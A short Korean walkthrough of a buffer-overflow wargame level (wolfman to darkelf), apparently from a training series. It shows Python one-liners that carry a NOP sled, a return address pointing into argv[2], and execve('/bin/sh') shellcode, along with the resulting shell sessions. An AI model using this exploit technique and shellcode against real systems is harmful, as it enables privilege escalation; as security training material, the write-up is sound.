wolfman -> darkelf

argv[1] 의 길이체크 및 버퍼 초기화.

새로운 인자값을 줌으로서 argv[2] 로 넘어간다.

darkelf 소스코드에서 argv[2] 의 주소를 출력하는 코드를 추가하고.

그 주소를 바탕으로 RET를 돌리면 쉘을 획득할 수 있다.

[wolfman@localhost tmp]$ ls
copyelf  darkelf  darkelf.c
[wolfman@localhost tmp]$ ./copyelf `python -c 'print "\x90"*44 + "\xbf"*4 +" "+ "\x90"*1000'`
argv[2] = 0xbffff85a
������������������������������������������������
Segmentation fault (core dumped)
[wolfman@localhost tmp]$ ./darkelf 
argv error
[wolfman@localhost tmp]$ ./darkelf `python -c 'print "\x90"*44 + "\x5a\xf8\xff\xbf" + " " + "\x90"*10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
��������������������������������������������Z���
bash$ id
uid=505(wolfman) gid=505(wolfman) groups=505(wolfman)
bash$
bash$ exit
exit
[wolfman@localhost tmp]$ ../darkelf `python -c 'print "\x90"*44 + "\x5a\xf8\xff\xbf" + " " + "\x90"*10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
��������������������������������������������Z���
bash$ my-pass
euid = 506
kernel crashed
bash$